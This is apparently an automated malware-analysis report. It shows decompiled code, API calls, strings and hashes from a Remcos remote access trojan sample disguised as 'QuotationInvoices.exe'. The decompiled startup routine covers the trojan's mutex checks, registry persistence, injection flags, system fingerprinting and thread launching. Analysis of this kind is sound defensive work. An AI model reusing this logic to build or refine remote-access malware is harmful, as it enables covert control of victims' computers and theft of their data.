Instruction ID: fcbd571c5e0878b0b3b0b26425187d02c52ea1a313ddce3ae06fd811c8abcc26
Opcode Fuzzy Hash: ce650935286e439547cb14a4325621db24ed031be4c769f4698fb39bd9379722
Instruction Fuzzy Hash: E821F6A0A8071879DA107FB25C4DE0B2D599A84B573200833E904A3593FAFC941CCE9F

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2AA, Relevance: 60.4, APIs: 16, Strings: 18, Instructions: 891
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040C2AA(void* __edx, void* __eflags, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v748;
				char _v752;
				char _v760;
				void* _v784;
				void* _v788;
				char _v792;
				char _v796;
				struct _SECURITY_ATTRIBUTES* _v800;
				char _v804;
				char _v808;
				void* _v812;
				void* _v816;
				char _v824;
				signed int _v828;
				signed char _v832;
				signed char _v833;
				char _v836;
				void* _v840;
				void* _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t105;
				void* _t112;
				intOrPtr* _t119;
				signed int _t123;
				CHAR* _t126;
				long _t129;
				signed char _t131;
				char _t135;
				void* _t136;
				signed int _t140;
				signed char _t155;
				void* _t159;
				void* _t160;
				char _t168;
				signed int _t175;
				void* _t182;
				void* _t187;
				signed int _t196;
				char* _t199;
				signed int _t201;
				void* _t213;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				intOrPtr _t235;
				intOrPtr* _t238;
				void* _t240;
				void* _t246;
				char* _t249;
				void* _t252;
				char* _t256;
				void* _t265;
				void* _t273;
				signed short* _t278;
				void* _t279;
				void* _t280;
				signed int _t281;
				void* _t287;
				void* _t293;
				void* _t295;
				char* _t298;
				char* _t300;
				intOrPtr* _t302;
				void* _t305;
				intOrPtr* _t313;
				void* _t316;
				intOrPtr* _t324;
				signed int _t325;
				signed int _t331;
				signed int _t342;
				struct _SECURITY_ATTRIBUTES* _t346;
				signed char _t349;
				char* _t454;
				signed int _t476;
				signed int _t480;
				signed char _t492;
				signed int _t498;
				signed int _t501;
				signed int _t547;
				void* _t549;
				void* _t551;
				signed int _t576;
				signed int _t579;
				char* _t590;
				void* _t594;
				char* _t599;
				void* _t600;
				char* _t606;
				intOrPtr* _t607;
				intOrPtr* _t609;
				void* _t612;
				void* _t613;
				signed int _t614;
				signed int _t619;
				void* _t622;
				void* _t623;
				void* _t624;
				void* _t626;
				void* _t628;
				void* _t633;
				void* _t634;

				_t560 = __edx;
				_t346 = 0;
				_v832 = 0;
				E0040CDFA( &_v724, __edx, __eflags);
				_t622 = (_t619 & 0xfffffff8) - 0x32c;
				E00402036(0, _t622, __edx, __eflags, 0x46b57c);
				_t623 = _t622 - 0x18;
				E00402036(0, _t623, __edx, __eflags,  &_v728);
				_t105 = E00416EC5( &_v804, __edx); // executed
				_t624 = _t623 + 0x30;
				E0040D620(__edx, _t105);
				E00401DD8( &_v808, __edx);
				_t362 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t590 = 0x46b558;
					__eflags =  *((intOrPtr*)(E00401EF9(E00401DAD(0x46b558, _t560, __eflags, 3)))) - _t346;
					 *0x46ab05 = __eflags != 0;
					_t112 = E004051FC(_t346,  &_v804, E00407160( &_v832, "Software\\", __eflags, E00401DAD(0x46b558, _t560, __eflags, 0xe)), 0x46b558, __eflags, "\\");
					_t599 = 0x46b4f8;
					E00401F1B(0x46b4f8, _t111, 0x46b4f8, _t112);
					E00401F11();
					E00401F11();
					E00401DAD(0x46b558, _t111, __eflags, 0x32);
					__eflags =  *((intOrPtr*)(E004050D0(_t346))) - _t346;
					 *0x46ad4a = __eflags != 0;
					E00401DAD(0x46b558, _t111, __eflags, 0x33);
					_t119 = E004050D0(_t346);
					__eflags =  *_t119 - _t346;
					 *0x46ad4b =  *_t119 != _t346;
					__eflags =  *0x46ad4a - _t346; // 0x0
					if(__eflags == 0) {
						L8:
						_v828 = _t346;
						_t600 = OpenMutexA(0x100000, _t346, "Remcos_Mutex_Inj");
						__eflags = _t600;
						if(_t600 != 0) {
							WaitForSingleObject(_t600, 0xea60);
							CloseHandle(_t600);
						}
						_t563 = E00401EF9(0x46b4f8); // executed
						_t123 = E00410145(_t122, "Inj",  &_v828); // executed
						__eflags = _t123;
						if(__eflags != 0) {
							_t563 = E00401EF9(0x46b4f8);
							E004105A2(_t336, __eflags, "Inj");
						}
						E0040416D(0x46b528, E00401DAD(_t590, _t563, __eflags, 0xe));
						_t126 = E00401EF9(0x46b528);
						_t349 = 1;
						CreateMutexA(0, 1, _t126); // executed
						_t129 = GetLastError();
						__eflags = _t129 - 0xb7;
						if(_t129 == 0xb7) {
							L51:
							E00401F11();
							_t131 = _t349;
							goto L5;
						} else {
							E0040CEAE();
							GetModuleFileNameW(0, "C:\Users\jones\Desktop\QuotationInvoices.exe", 0x104);
							_t135 = E00416F93(0x46b528);
							_push(0x46b528);
							_t564 = 0x80000002;
							 *0x46aea1 = _t135;
							_t136 = E004101A2( &_v824, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
							_t626 = _t624 + 0xc;
							_t604 = 0x46b594;
							E00401F1B(0x46b594, 0x80000002, 0x46b594, _t136);
							E00401F11();
							__eflags =  *0x46aea1;
							if( *0x46aea1 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							E004058BF(_t349, 0x46b594, _t590);
							_t140 =  *0x46ad24;
							__eflags = _t140;
							if(_t140 != 0) {
								 *0x4699d4 =  *_t140();
							}
							__eflags = _v828;
							if(__eflags == 0) {
								_t549 = E00401DAD(_t590, _t564, __eflags, 0x2e);
								__eflags =  *((char*)(E00401EF9(_t549)));
								if(__eflags != 0) {
									__eflags =  *0x46ad24;
									if(__eflags != 0) {
										__eflags =  *0x4699d4;
										if( *0x4699d4 == 0) {
											_t564 = E00401EF9(0x46b4f8);
											_t331 = E004100FB(0x46b4f8, _t330, "origmsc");
											_pop(_t551);
											__eflags = _t331;
											if(__eflags == 0) {
												E00405A90(_t349, _t551, _t564);
											}
										} else {
											_push(_t549);
											_push(_t549);
											__eflags = E0040A6CD() - 0xffffffff;
											if(__eflags == 0) {
												E00405B8A(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(E00401EF9(E00401DAD(_t590, _t564, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D5BF();
							}
							_t565 = E00401DAD(_t590, _t564, __eflags, 0xb);
							E00401E5E(0x46b4c8, _t143, _t604, E00416DA4(_t143, __eflags));
							E00401E54();
							__eflags =  *((char*)(E00401EF9(E00401DAD(_t590, _t143, __eflags, 4))));
							 *0x46ab06 = __eflags != 0;
							__eflags =  *((char*)(E00401EF9(E00401DAD(_t590, _t143, __eflags, 5))));
							 *0x46aaff = __eflags != 0;
							__eflags =  *((char*)(E00401EF9(E00401DAD(_t590, _t143, __eflags, 8))));
							 *0x46ab04 = __eflags != 0;
							__eflags =  *((char*)(E00401EF9(E00401DAD(_t590, _t143, __eflags, 3))));
							if(__eflags == 0) {
								_t155 = _v832;
								goto L34;
							} else {
								_t324 = E00401E4F(E00416DA4(E00401DAD(_t590, _t565, __eflags, 0x30), __eflags));
								_t604 = 0;
								__eflags = 0;
								_t28 = _t324 + 2; // 0x2
								_t565 = _t28;
								do {
									_t547 =  *_t324;
									_t324 = _t324 + 2;
									__eflags = _t547;
								} while (_t547 != 0);
								_t325 = _t324 - _t565;
								__eflags = _t325;
								_t155 = _t349;
								if(_t325 == 0) {
									L34:
									__eflags = 0;
									_v833 = 0;
								} else {
									_v833 = _t349;
								}
							}
							__eflags = _t349 & _t155;
							if((_t349 & _t155) != 0) {
								E00401E54();
							}
							__eflags = _v833;
							if(__eflags != 0) {
								_t313 = E00401EF9(E00401DAD(_t590, _t565, __eflags, 9));
								_t604 = _t313;
								_t316 = E00401E4F(E00416DA4(E00401DAD(_t590, _t565, __eflags, 0x30), __eflags));
								_t565 =  *_t313;
								E00401E5E(0x46b510,  *_t313, _t313, E004179DE( &_v832,  *_t313, _t316));
								E00401E54();
								E00401E54();
							}
							__eflags = _v828;
							if(_v828 != 0) {
								__eflags = 0;
								E004315B0(_t590,  &_v524, 0, 0x208);
								_t159 = E004023D3();
								_t160 = E00401EF9(0x46b540);
								_t566 = E00401EF9(0x46b4f8);
								E004102F0(_t162, "exepath",  &_v524, 0x208, _t160, _t159);
								_t628 = _t626 + 0x20;
								E0040B611(_t349, 0x46b4e0,  &_v524);
								_t606 = 0x46b558;
								goto L53;
							} else {
								__eflags =  *0x46ab05;
								if(__eflags == 0) {
									E0040B611(_t349, 0x46b4e0, "C:\Users\jones\Desktop\QuotationInvoices.exe");
								} else {
									_t298 = E00401EF9(E00401DAD(_t590, _t565, __eflags, 0x1e));
									_t300 = E00401EF9(E00401DAD(0x46b558, _t565, __eflags, 0xc));
									_t302 = E00401EF9(E00401DAD(0x46b558, _t565, __eflags, 9));
									__eflags =  *_t298;
									__eflags =  *_t300;
									_t604 = 0x46b558;
									_t305 = E00401E4F(E00416DA4(E00401DAD(0x46b558, _t565, __eflags, 0xa), __eflags));
									E0040A927( *_t302, E00401E4F(E00416DA4(E00401DAD(0x46b558, _t303, __eflags, 0x30), __eflags)), _t305, ((_t301 & 0xffffff00 |  *_t298 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t301 & 0xffffff00 |  *_t298 != 0x00000000) & 0x000000ff);
									_t626 = _t626 + 0xc;
									E00401E54();
									E00401E54();
									_t349 = 1;
								}
								_t273 = E004023D3();
								_t576 = 2;
								_t498 =  ~(0 | __eflags > 0x00000000) | (_t273 + 0x00000001) * _t576;
								_push(_t498);
								_v832 = _t498;
								_t614 = E0042EB84(_t498, (_t273 + 1) * _t576 >> 0x20, _t604, __eflags);
								__eflags = _t614;
								if(_t614 == 0) {
									_t614 = 0;
								} else {
									E004315B0(0x46b4e0, _t614, 0, _v832);
									_t626 = _t626 + 0xc;
								}
								_t278 = E00401E4F(0x46b4e0);
								_t579 = _t614 - _t278;
								__eflags = _t579;
								_t594 = 2;
								do {
									_t501 =  *_t278 & 0x0000ffff;
									 *(_t278 + _t579) = _t501;
									_t278 = _t278 + _t594;
									__eflags = _t501;
								} while (_t501 != 0);
								_push(_t501);
								_t279 = E004023D3();
								_t280 = E00401EF9(0x46b540);
								_t281 = E004023D3();
								E00410540(E00401EF9(0x46b4f8), __eflags, "exepath", _t614, 2 + _t281 * 2, _t280, _t279); // executed
								E0042EB8D(_t614);
								_t606 = 0x46b558;
								_push(_t349);
								_t287 = E00401EF9(E00401DAD(0x46b558, _t283, __eflags, 0x34));
								_t633 = _t626 + 0x1c - 0x18;
								E00401FCE(_t349, _t633, _t287);
								_push("licence");
								E00410367(0x46b4f8, E00401EF9(0x46b4f8)); // executed
								_t628 = _t633 + 0x20;
								E00401DAD(0x46b558, _t289, __eflags, 0xd);
								_t566 = 0x45eb6c;
								__eflags = E00409AF8(__eflags);
								if(__eflags == 0) {
									L53:
									_t168 = E00435E19(_t166, E00401EF9(E00401DAD(_t606, _t566, __eflags, 0x28)));
									_t590 = CreateThread;
									 *0x46ab07 = _t168;
									__eflags = _t168 - 2;
									if(_t168 != 2) {
										__eflags = _t168 - _t349;
										if(__eflags == 0) {
											_t492 = 0;
											__eflags = 0;
											goto L57;
										}
									} else {
										_t492 = _t349;
										L57:
										E00418617(_t349, _t492, _t566);
										__eflags = 0;
										CreateThread(0, 0, E004183E6, 0, 0, 0);
									}
									 *0x4699d0 =  *((intOrPtr*)(E00401EF9(E00401DAD(_t606, _t566, __eflags, 0xf))));
									E00401ED1(_t349,  &_v752);
									E00416DA4(E00401DAD(_t606, _t566, __eflags, 0x31), __eflags);
									_t175 = E00407320(0x464a0c);
									_t351 = _t175;
									E00401E54();
									_t607 = E00401EF9(E00401DAD(_t606, 0x464a0c, __eflags, 0x10));
									__eflags = _t175;
									if(__eflags == 0) {
										_t351 = 0x46b558;
										_t182 = E004179DE( &_v828,  *_t607, E00401E4F(E00416DA4(E00401DAD(0x46b558, 0x464a0c, __eflags, 0x31), __eflags))); // executed
										E00401E5E(0x46b3a8,  *_t607, 0x46b3a8, _t182);
										E00401E54();
										E00401E54();
										_t187 = E00416DA4(E00401DAD(0x46b558,  *_t607, __eflags, 0x11), __eflags);
										_t573 = E0040708E( &_v808, 0x46b3a8, __eflags, "\\");
										E00401E5E( &_v760, _t573, 0x46b3a8, E00402F24( &_v836, _t573, _t187));
										E00401E54();
										E00401E54();
									} else {
										_t265 = E00401E4F(E00416DA4(E00401DAD(0x46b558, 0x464a0c, __eflags, 0x11), __eflags));
										_t573 =  *_t607;
										E00401E5E( &_v752, _t573, _t607, E004179DE( &_v828, _t573, _t265));
										E00401E54();
									}
									E00401E54();
									_t599 = 0x46b558;
									_t196 = E00435E19(_t194, E00401EF9(E00401DAD(0x46b558, _t573, __eflags, 0x36)));
									asm("cdq");
									 *0x46b3d8 = _t196 * 0x3e8;
									 *0x46b3dc = _t573;
									_t199 = E00401EF9(E00401DAD(0x46b558, _t573, __eflags, 0x37));
									__eflags =  *_t199;
									 *0x46b37a =  *_t199 != 0;
									_t201 =  *0x4699d0 - 0x31;
									__eflags = _t201;
									if(__eflags == 0) {
										E00406E88(_t351, _t628, _t573, __eflags,  &_v748);
										E00408215(0x46b330, __eflags); // executed
									} else {
										__eflags = _t201 - 1;
										if(__eflags == 0) {
											E00406E88(_t351, _t628, _t573, __eflags,  &_v748);
											E004082BB(0x46b330);
										}
									}
									__eflags =  *((intOrPtr*)(E00401EF9(E00401DAD(_t599, _t573, __eflags, 0x14)))) - 1;
									if(__eflags == 0) {
										_t252 = 2;
										_t613 = E0042E8D6(_t573, _t599, __eflags, _t252);
										 *_t613 = 0;
										_t480 = E00401DAD(0x46b558, _t573, __eflags, 0x35);
										_t256 = E00401EF9(_t480);
										__eflags =  *_t256;
										__eflags = 0;
										 *((char*)(_t613 + 1)) = _t480 & 0xffffff00 |  *_t256 != 0x00000000;
										CreateThread(0, 0, E004153A9, _t613, 0, 0);
										_t599 = 0x46b558;
									}
									__eflags =  *((intOrPtr*)(E00401EF9(E00401DAD(_t599, _t573, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t246 = 2;
										_t612 = E0042E8D6(_t573, _t599, __eflags, _t246);
										 *_t612 = 1;
										_t476 = E00401DAD(0x46b558, _t573, __eflags, 0x35);
										_t249 = E00401EF9(_t476);
										__eflags =  *_t249;
										__eflags = 0;
										 *((char*)(_t612 + 1)) = _t476 & 0xffffff00 |  *_t249 != 0x00000000;
										CreateThread(0, 0, E004153A9, _t612, 0, 0);
										_t599 = 0x46b558;
									}
									__eflags =  *((intOrPtr*)(E00401EF9(E00401DAD(_t599, _t573, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46aa75 = 1;
										_t238 = E00401EF9(E00401DAD(_t599, _t573, __eflags, 0x25));
										_t240 = E00401EF9(E00401DAD(0x46b558, _t573, __eflags, 0x26));
										_t573 =  *_t238;
										E00401E5E(0x46b0d8,  *_t238, _t238, E00417992( &_v800,  *_t238, __eflags, _t240));
										E00401E54();
										__eflags = 0;
										CreateThread(0, 0, E00401B31, 0, 0, 0);
										_t599 = 0x46b558;
									}
									__eflags =  *((intOrPtr*)(E00401EF9(E00401DAD(_t599, _t573, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t599 = E00401EF9(E00401DAD(_t599, _t573, __eflags, 0x2c));
										_t235 = E00435E19(_t233, E00401EF9(E00401DAD(0x46b558, _t573, __eflags, 0x2d)));
										__eflags =  *_t599;
										_t573 = _t235;
										__eflags =  *_t599 != 0;
										E0040A631(_t235);
									}
									_t213 = E00416790( &_v792, _t590, __eflags); // executed
									E00401E5E(0x46b564, _t573, _t599, _t213);
									_t454 =  &_v796;
									E00401E54();
									_t216 =  *0x46ad18;
									_t346 = 0;
									__eflags = _t216;
									if(_t216 != 0) {
										 *_t216(0); // executed
									}
									CreateThread(_t346, _t346, E0040D27D, _t346, _t346, _t346); // executed
									__eflags =  *0x46ad4a;
									if( *0x46ad4a != 0) {
										CreateThread(_t346, _t346, E0040F31A, _t346, _t346, _t346);
									}
									__eflags =  *0x46ad4b;
									if( *0x46ad4b != 0) {
										CreateThread(_t346, _t346, E0040F838, _t346, _t346, _t346);
									}
									_t218 =  *0x4699d4; // 0x1
									_t219 = _t218 - _t346;
									__eflags = _t219;
									if(__eflags == 0) {
										goto L83;
									} else {
										__eflags = _t219 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L84;
										}
									}
									goto L85;
								} else {
									_t293 = E00401DAD(0x46b558, 0x45eb6c, __eflags, 0xd);
									_t634 = _t628 - 0x18;
									_t566 = _t293;
									E00416CBE(_t634, _t293, __eflags);
									_t295 = E0040CFD5(__eflags);
									_t628 = _t634 + 0x18;
									__eflags = _t295 - _t349;
									if(__eflags != 0) {
										goto L53;
									} else {
										_t349 = 3;
										goto L51;
									}
								}
							}
						}
					} else {
						_v800 = _t346;
						_t342 = E00410145(E00401EF9(0x46b4f8), "WD",  &_v800);
						__eflags = _t342;
						if(_t342 != 0) {
							E004105A2(E00401EF9(0x46b4f8), __eflags, "WD");
							E0040F5E8();
							L83:
							_push("User");
							L84:
							E0040713C(_t346, _t628 - 0x18, "Access level: ", _t590, __eflags, E00401FCE(_t346,  &_v796));
							E00401FCE(_t346, _t628 - 4, "[Info]");
							E00416673(_t346, _t590);
							_t454 =  &_v804;
							E00401F11(); // executed
							L85:
							E00411225(); // executed
							asm("int3");
							_push(_t599);
							_t609 = _t454 + 0x68;
							E0040D6DC(_t346, _t609);
							_t362 = _t609;
							 *_t362 = 0x45f7b0;
							 *_t362 = 0x45f76c;
							return E0042FBB3(_t362);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0040D70B( &_v700, __edx, __eflags, "licence_code.txt", 2);
							__ecx = 0x46b558;
							__ecx = E00401DAD(0x46b558, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = E0040EA82( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0040D6BC( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L86();
							__ecx =  &_v744;
							E00401F11() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t131;
						}
					}
				}
			}

0x0040c2aa
0x0040c2b8
0x0040c2bf
0x0040c2c3
0x0040c2c8
0x0040c2d2
0x0040c2d7
0x0040c2e4
0x0040c2ed
0x0040c2f2
0x0040c2f6
0x0040c2ff
0x0040c304
0x0040c30a
0x0040c380
0x0040c380
0x0040c39e
0x0040c3a0
0x0040c3c2
0x0040c3c8
0x0040c3d0
0x0040c3d9
0x0040c3e2
0x0040c3ec
0x0040c3fd
0x0040c3ff
0x0040c406
0x0040c40d
0x0040c412
0x0040c414
0x0040c41b
0x0040c421
0x0040c449
0x0040c454
0x0040c45e
0x0040c460
0x0040c462
0x0040c46a
0x0040c471
0x0040c471
0x0040c48e
0x0040c490
0x0040c497
0x0040c499
0x0040c4a3
0x0040c4a5
0x0040c4aa
0x0040c4bc
0x0040c4c3
0x0040c4cd
0x0040c4d0
0x0040c4d6
0x0040c4dc
0x0040c4e1
0x0040c90e
0x0040c915
0x0040c91a
0x00000000
0x0040c4e7
0x0040c4e7
0x0040c4f9
0x0040c4ff
0x0040c504
0x0040c50f
0x0040c514
0x0040c51d
0x0040c522
0x0040c525
0x0040c52d
0x0040c536
0x0040c53b
0x0040c544
0x0040c54d
0x0040c546
0x0040c546
0x0040c546
0x0040c552
0x0040c557
0x0040c55c
0x0040c55e
0x0040c562
0x0040c562
0x0040c567
0x0040c56c
0x0040c577
0x0040c57e
0x0040c581
0x0040c583
0x0040c58a
0x0040c58c
0x0040c593
0x0040c5b7
0x0040c5b9
0x0040c5be
0x0040c5bf
0x0040c5c1
0x0040c5c3
0x0040c5c3
0x0040c595
0x0040c595
0x0040c596
0x0040c59c
0x0040c59f
0x0040c5a1
0x0040c5a1
0x0040c59f
0x0040c593
0x0040c58a
0x0040c581
0x0040c5d8
0x0040c5db
0x0040c5dd
0x0040c5dd
0x0040c5eb
0x0040c5fc
0x0040c605
0x0040c61e
0x0040c621
0x0040c638
0x0040c63b
0x0040c652
0x0040c655
0x0040c668
0x0040c66b
0x0040c6a6
0x00000000
0x0040c66d
0x0040c683
0x0040c688
0x0040c688
0x0040c68a
0x0040c68a
0x0040c68d
0x0040c68d
0x0040c690
0x0040c693
0x0040c693
0x0040c698
0x0040c698
0x0040c69c
0x0040c69e
0x0040c6aa
0x0040c6aa
0x0040c6ac
0x0040c6a0
0x0040c6a0
0x0040c6a0
0x0040c69e
0x0040c6b0
0x0040c6b2
0x0040c6b8
0x0040c6b8
0x0040c6bd
0x0040c6c2
0x0040c6cf
0x0040c6d8
0x0040c6ec
0x0040c6f1
0x0040c704
0x0040c70d
0x0040c716
0x0040c716
0x0040c71b
0x0040c720
0x0040c926
0x0040c932
0x0040c941
0x0040c949
0x0040c967
0x0040c969
0x0040c96e
0x0040c97e
0x0040c983
0x00000000
0x0040c726
0x0040c726
0x0040c72d
0x0040c7eb
0x0040c733
0x0040c73e
0x0040c755
0x0040c767
0x0040c76c
0x0040c774
0x0040c77a
0x0040c79d
0x0040c7c2
0x0040c7c7
0x0040c7ce
0x0040c7d7
0x0040c7de
0x0040c7de
0x0040c7f7
0x0040c801
0x0040c809
0x0040c80b
0x0040c80c
0x0040c815
0x0040c81a
0x0040c81c
0x0040c82e
0x0040c81e
0x0040c824
0x0040c829
0x0040c829
0x0040c832
0x0040c83b
0x0040c83b
0x0040c83d
0x0040c83e
0x0040c83e
0x0040c841
0x0040c845
0x0040c847
0x0040c847
0x0040c84c
0x0040c854
0x0040c85c
0x0040c867
0x0040c888
0x0040c88e
0x0040c896
0x0040c89d
0x0040c8a7
0x0040c8ac
0x0040c8b2
0x0040c8b7
0x0040c8c5
0x0040c8ca
0x0040c8d1
0x0040c8d6
0x0040c8e2
0x0040c8e4
0x0040c988
0x0040c999
0x0040c99e
0x0040c9a4
0x0040c9aa
0x0040c9ac
0x0040c9b2
0x0040c9b4
0x0040c9b6
0x0040c9b6
0x00000000
0x0040c9b6
0x0040c9ae
0x0040c9ae
0x0040c9b8
0x0040c9b8
0x0040c9bd
0x0040c9c9
0x0040c9c9
0x0040c9e1
0x0040c9e6
0x0040c9fa
0x0040ca06
0x0040ca0f
0x0040ca11
0x0040ca26
0x0040ca28
0x0040ca2a
0x0040ca73
0x0040ca9a
0x0040caa8
0x0040cab1
0x0040caba
0x0040cace
0x0040cae5
0x0040caf6
0x0040caff
0x0040cb08
0x0040ca2c
0x0040ca45
0x0040ca4a
0x0040ca5c
0x0040ca65
0x0040ca6a
0x0040cb11
0x0040cb16
0x0040cb2c
0x0040cb3c
0x0040cb3d
0x0040cb42
0x0040cb4f
0x0040cb54
0x0040cb5e
0x0040cb65
0x0040cb65
0x0040cb68
0x0040cb9a
0x0040cba4
0x0040cb6a
0x0040cb6a
0x0040cb6d
0x0040cb7c
0x0040cb86
0x0040cb86
0x0040cb6d
0x0040cbbc
0x0040cbbe
0x0040cbc2
0x0040cbc9
0x0040cbd5
0x0040cbdc
0x0040cbde
0x0040cbe3
0x0040cbe9
0x0040cbf5
0x0040cbf8
0x0040cbfa
0x0040cbfa
0x0040cc0f
0x0040cc11
0x0040cc15
0x0040cc1c
0x0040cc26
0x0040cc2d
0x0040cc2f
0x0040cc34
0x0040cc3a
0x0040cc46
0x0040cc49
0x0040cc4b
0x0040cc4b
0x0040cc60
0x0040cc62
0x0040cc68
0x0040cc75
0x0040cc8a
0x0040cc8f
0x0040cca2
0x0040ccab
0x0040ccb0
0x0040ccbc
0x0040ccbe
0x0040ccbe
0x0040ccd3
0x0040ccd5
0x0040ccee
0x0040ccfd
0x0040cd02
0x0040cd05
0x0040cd08
0x0040cd0b
0x0040cd0b
0x0040cd14
0x0040cd1f
0x0040cd24
0x0040cd28
0x0040cd2d
0x0040cd32
0x0040cd34
0x0040cd36
0x0040cd39
0x0040cd39
0x0040cd45
0x0040cd47
0x0040cd4e
0x0040cd5a
0x0040cd5a
0x0040cd5c
0x0040cd63
0x0040cd6f
0x0040cd6f
0x0040cd71
0x0040cd76
0x0040cd76
0x0040cd78
0x00000000
0x0040cd7a
0x0040cd7a
0x0040cd7d
0x0040cd7f
0x00000000
0x0040cd7f
0x0040cd7d
0x00000000
0x0040c8ea
0x0040c8ee
0x0040c8f3
0x0040c8f6
0x0040c8fa
0x0040c8ff
0x0040c904
0x0040c907
0x0040c909
0x00000000
0x0040c90b
0x0040c90d
0x00000000
0x0040c90d
0x0040c909
0x0040c8e4
0x0040c720
0x0040c423
0x0040c427
0x0040c43a
0x0040c441
0x0040c443
0x0040cd94
0x0040cd9e
0x0040cda3
0x0040cda3
0x0040cda8
0x0040cdbc
0x0040cdcb
0x0040cdd0
0x0040cdd8
0x0040cddc
0x0040cde1
0x0040cde1
0x0040cde6
0x0040cde7
0x0040cde8
0x0040cded
0x0040cdf2
0x0040e1f9
0x0040c163
0x0040c16f
0x00000000
0x00000000
0x00000000
0x0040c443
0x0040c30c
0x0040c30c
0x0040c310
0x00000000
0x0040c312
0x0040c312
0x0040c316
0x0040c318
0x00000000
0x0040c31a
0x0040c31a
0x0040c31b
0x0040c323
0x0040c32a
0x0040c331
0x0040c33b
0x0040c342
0x0040c344
0x0040c34b
0x0040c350
0x0040c357
0x0040c35c
0x0040c363
0x0040c368
0x0040c374
0x0040c376
0x0040c376
0x0040c377
0x0040c37d
0x0040c37d
0x0040c318
0x0040c310

APIs

OpenMutexA.KERNEL32 ref: 0040C458
WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C46A
CloseHandle.KERNEL32(00000000), ref: 0040C471
CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C4D0
GetLastError.KERNEL32 ref: 0040C4D6
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\QuotationInvoices.exe,00000104), ref: 0040C4F9

Part of subcall function 0040EA82: __EH_prolog.LIBCMT ref: 0040EA87

Strings

[Info], xrefs: 0040CDC6
(64 bit), xrefs: 0040C546
Inj, xrefs: 0040C47B, 0040C486, 0040C49B
Remcos_Mutex_Inj, xrefs: 0040C449
ProductName, xrefs: 0040C505
Administrator, xrefs: 0040CD7F
licence, xrefs: 0040C8B7
Remcos, xrefs: 0040C5F7
User, xrefs: 0040CDA3
exepath, xrefs: 0040C87C, 0040C95D
licence_code.txt, xrefs: 0040C31E
Software\, xrefs: 0040C3AD
C:\Users\user\Desktop\QuotationInvoices.exe, xrefs: 0040C4F1, 0040C7E1
(32 bit), xrefs: 0040C54D
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040C50A
Access level: , xrefs: 0040CDB4
origmsc, xrefs: 0040C5A8
Remcos-I9UILL, xrefs: 0040C4B4

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Users\user\Desktop\QuotationInvoices.exe$Inj$ProductName$Remcos$Remcos-I9UILL$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$licence_code.txt$origmsc
API String ID: 1247502528-115223117
Opcode ID: d37008e2da05b7624700db6c8f0658545805cb06c97f57fd21b6ae7b241e4b9a
Instruction ID: 3f185234528112ff67f9034dc07149414419bafc35117023c84f2f368c077e96
Opcode Fuzzy Hash: d37008e2da05b7624700db6c8f0658545805cb06c97f57fd21b6ae7b241e4b9a
Instruction Fuzzy Hash: 7942D561B042406ADB14B7758856B7F269A8FC1308F44443FF842BB2E3EE7C9D49839E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D27D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00410145: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410165
Part of subcall function 00410145: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046B4F8), ref: 00410183
Part of subcall function 00410145: RegCloseKey.KERNELBASE(?), ref: 0041018E

Sleep.KERNELBASE(00000BB8), ref: 0040D331
ExitProcess.KERNEL32 ref: 0040D3A6

Strings

pth_unenc, xrefs: 0040D2D6, 0040D349
3.1.0 Pro, xrefs: 0040D30C, 0040D37F
override, xrefs: 0040D29C

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.1.0 Pro$override$pth_unenc
API String ID: 2281282204-257782887
Opcode ID: 425d701535e134ea0312a118d183d77eae590b59ec163b209fa2616c3847649f
Instruction ID: 96c092004ce5439268ca52636138389a1ddda74654096b31851ad5967d6113e6
Opcode Fuzzy Hash: 425d701535e134ea0312a118d183d77eae590b59ec163b209fa2616c3847649f
